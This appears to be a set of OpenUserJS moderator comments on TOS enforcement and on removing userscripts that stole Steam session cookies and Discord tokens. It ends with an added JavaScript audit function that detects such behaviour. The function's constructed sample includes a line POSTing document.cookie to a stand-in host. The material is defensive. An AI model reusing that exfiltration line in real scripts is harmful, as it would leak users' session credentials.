This is currently the earliest copy that can be found of this script.

If anyone decides to fork it... please use this script's source page, make your changes, then click "Submit Code as Fork".

If anyone fails to do this the accounts associated are very eligible for removal... and some already have been.

Please abide by the TOS regarding this matter.

Thank you for your cooperation.

Re: @Kevin_Kelly:

This is your only warning. Please do not violate the TOS with posting script source only in a comment and without a named code fence. Presuming the discussion topic is correct, the highlighting language name code is tex; otherwise, if it is js, use that.

Do it again and the TOS default action will be applied. Closing issue.

You also improperly forked this script. Please use the script source on this script's source page and click "Submit Script as Fork" in the future. It has been corrected. Again this is your only warning.

Re: @birkett83:

Try it without the minification routines i.e.

// @require
// @require
// @require

Your version of Tampermonkey (TM) may be utilizing SRI and the jsdelivr server might not be well tweaked for that just yet or vice versa.

In any case TM issues is where you might get more in-depth answers for that .user.js engine.

Re: @GreenLunar:

"[Event Listener] Easy and efficient way to catch data generated upon event"

Is this discussion subject a statement or are you asking a question?

Assuming a question, based off what you said (some buzz words detected) of:

Yet, the following code is generated only on Event

... means one should probably be using a MutationObserver to detect changes in the DOM and probably attempting to run the .user.js as soon as possible with @run-at in the UserScript metadata block. How you parse the DOM fragments is up to you at that point.


Regarding your inquiry... you missed the window of opportunity especially with the original 1.0 deprecation announcement.

Read everything in this discussion and what it links to as well. Since you didn't leave me enough breadcrumbs to validate your old identity I can't merge you.

I would suggest on your new account that you mention something in your profile about your old one... although, again, nothing to validate the old account is actually yours.

You do realize I have enough to remove this script and yourself for Copyright infringement by not giving credit for this work.

Since this script is clearly a derivative of it you should have done that and because it is a lot of code I'm more inclined to give credibility that you may have inserted some custom code into here. You should @require that GH link's source and then add whatever changes in this script.

Depending on how, and if you respond, to this I may have to take the default action for this.

Re: @theundeadwolf0:

Yes a lot of people do care and don't work on a TOS violation yourself as you may be removed if you continue this sort of behaviour.

Re: @Bogudan:

Granted. In the meantime to prevent spurious responses like @theundeadwolf0 please stick to flagging only.

You need to divulge transferring private information on the Script Info page to your custom API or else you'll be removed again.

Re: @WildLion:

... It's the only way. ...

... if possible

Not possible as I already mentioned. You are out of luck at this time.

Ask GH to rename you. It's the only way. Otherwise you get to create another OUJS account here and lose any stats.

Sending someone's steam session cookie from off to is an odd action. Again all you had to do is explain it clearly and don't obfuscate via manual script injection.

Since you've violated the TOS multiple times... Bye.

Manual script injection and then POSTing to a managed URL at https://e.not-undo.xy with unannounced session stealing found.

All you had to do was describe what you were doing clearly. Instead you tried to obfuscate it. Not the brightest idea.

You might want to make this change:

--- /scripts/haibrvt/Hệ_Thống_Tự_Động_Roll_Free_BOT/source@8.0+09455a3
+++ /scripts/haibrvt/Hệ_Thống_Tự_Động_Roll_Free_BOT/source
@@ -8,7 +8,6 @@
 // @match*
 // @downloadURLệ_Thống_Tự_Động_Roll_Free_BOT.user.js
 // @updateURLệ_Thống_Tự_Động_Roll_Free_BOT.meta.js
-// @requireệ_Thống_Tự_Động_Roll_Free_BOT.user.js
 // @grant        none
 // @license MIT
 // @copyright 2021, haibrvt (
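
Review bot: the removed `// @require` line ends in the same `Roll_Free_BOT.user.js` file name as the `@downloadURL` line two above it, so the script was requiring a copy of itself, and dropping that line is the right fix. The hunk only covers header lines 8 to 14, so before accepting it check that no other `@require` elsewhere in the metadata block points back at this script or at another OUJS-hosted `.user.js`.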

Attempting to cause a DoS by referencing another script on OUJS with this one is not a wise move and will lead to removal shortly.

Re: @cuzi:

Whoever created the facebook app would probably need to login on and see if there are any issues.

That would be @sizzle. I don't control the publishing of the API keys i.e. I don't own the accounts. The only one I own is the test on dev for GitLab but that's not on production since @sizzle would need to be the owner of it.

Thanks for the tips. Hope he's watching. In the times I've been here I haven't seen anyone with FB logged in yet so I'm guessing there is probably an issue.



remove this, made this fork by mistake

If you wish to delete this, please do it yourself as the account author. On each script homepage there is a "Delete Script" in the "Danger Zone".

I will be clearing this flag as it is inappropriate use of the flagging system when you can delete it as the owner of the script while logged in. Since your flag isn't from this account it is also something that we can not do by proxy.

That dialog isn't anything that we generate and I don't think the dependency generates that either. So I'm not sure where that is coming from.

The only issue on that dependency that shows anything like this is at jaredhanson/passport-facebook#240. I'll leave a message there for that reporter (unfortunately they didn't say how they fixed it and not sure that person will respond) but we aren't in dev mode here... there would be a little "dev" next to OpenUserJS in the upper left corner if we were.

At some point I'll probably retry signing up for FB even though I have strong feelings against that site, etc. Last time I signed up for a test they started nagging me... ~"Are you still there", ~"We haven't seen you in a while", ~"We don't think you're there, you need to come here", ~"We're going to delete your account if you don't come here", etc. Has left a super bitter taste.

Re: @Anakunda:

... or where can I submit the bug report?

See the Development link at the bottom of every page on the site.

Can it be resolved...?

See #793. This is also tied in with not utilizing jQuery in #904 at some point. Most of the supported browsers (via TLS version compatibility) don't need it anymore and pure vanilla JavaScript can do it all.

Re: @Marti:
Correction... prepends it to their navigation bar... so at the start.

Hope you find it. :)


It currently appears to load a hidden menu item called Super Browse that is placed in something called the Super Browse Nav wherever that may be. It activates when you mouse over the tail end of that navigation bar and rehides when you leave it with the mouse. An example of a navigation bar here on OUJS is above on this page where it says "About Source Code Issues". That's a script navigation bar. The main navigation bar for OUJS is at the very top. So I assume Netflix has something similar. It may be horizontal like ours or vertical. Since I'm not on Netflix or there atm don't know for sure.

So move the mouse around and see where it appears. The script is a little dated (2016) so it may not work if the navigation bar it is attaching to no longer exists on the site or the DOM node it attaches to has been renamed.

Re: @quin!!:

tried to steal my discord account...

Let's see... with 0.1+b3eefc8:

  1. // @description itty bitty script to grab a yummy token from whoever installs it :yum:. I interpret this @description as:

    ~"itty bitty script to grab a yummy token from whoever (is inept enough to) install it :yum:".

Pretty clear that you probably shouldn't be using this script unless you want the next item to happen.

  2. The POST request to the sites API group is at And you may notice the crafting of the userToken which sends it off to this group as a description item. Most likely your userToken was published there for anyone with access to that group.

  3. Paying attention to item 2 it's in the clear atm and clearly labeled as what it can do for you. Personally, if I was on discord, I wouldn't be running this script. Also other discord scripts can access the localStorage items (and a cookie manipulation hook as well) this script creates so it's possible there may be other vectors.

  4. This script can show how their sites API can be manipulated into taking some private info and making it public. While I may not agree with the contents of the script, I find no deception, atm, with this version of the Userscript.

Long story short... good to let people know what you have experienced but now you know what not to do (installing something foreign) without first investigating it.

Please remember to give this a reread.
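
An added example, not part of the original comments or of OpenUserJS's own code: a heuristic source audit for the kind of pre-install investigation described above, flagging the three behaviours these comments call out (a script that `@require`s itself, manual script injection, and reading cookies or storage in a script that also makes outbound requests). The function names, the sample script and its `.example` hosts are constructed for illustration.

```javascript
// Added example; auditUserscript/parseMeta and SAMPLE are hypothetical names.
// Heuristic text matching only: a hit means "read this part closely", not proof.
const META_RE = /\/\/ ==UserScript==([\s\S]*?)\/\/ ==\/UserScript==/;

function parseMeta(source) {
  const meta = {};
  const block = source.match(META_RE);
  for (const line of block ? block[1].split('\n') : []) {
    const kv = line.match(/^\s*\/\/\s*@(\S+)\s+(.*\S)\s*$/);
    if (kv) (meta[kv[1]] = meta[kv[1]] || []).push(kv[2]);
  }
  return meta;
}

function auditUserscript(source) {
  const meta = parseMeta(source);
  const body = source.replace(META_RE, '');
  const findings = [];
  // A @require that equals the script's own install/update URL loads itself.
  const own = new Set([...(meta.downloadURL || []), ...(meta.updateURL || [])]);
  for (const req of meta.require || []) {
    if (own.has(req)) findings.push('self-require: ' + req);
  }
  // Credential-bearing storage read in a script that also talks to the network.
  const reads = /document\.cookie|localStorage|sessionStorage/.test(body);
  const sends = /\bfetch\s*\(|XMLHttpRequest|GM_xmlhttpRequest|GM\.xmlHttpRequest|sendBeacon/.test(body);
  const hosts = new Set();
  for (const u of body.match(/https?:\/\/[^\s'"`)]+/g) || []) {
    try { hosts.add(new URL(u).hostname); } catch (e) { /* not a URL */ }
  }
  if (reads && sends) findings.push('storage-read-plus-request: ' + [...hosts].sort().join(','));
  // Manual injection of a <script> element into the page.
  if (/createElement\(\s*['"]script['"]\s*\)/.test(body)) findings.push('script-injection');
  return findings;
}

// Constructed sample input (not a real script).
const SAMPLE = [
  '// ==UserScript==',
  '// @match       https://site.example/*',
  '// @downloadURL https://host.example/install/sample.user.js',
  '// @require     https://host.example/install/sample.user.js',
  '// @grant       none',
  '// ==/UserScript==',
  'const s = document.createElement("script");',
  'document.head.appendChild(s);',
  'fetch("https://collector.example/api", { method: "POST", body: document.cookie });',
].join('\n');
```

Calling `auditUserscript(SAMPLE)` returns one finding per behaviour; an empty array only means none of these patterns matched, so obfuscated source still needs a manual read.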

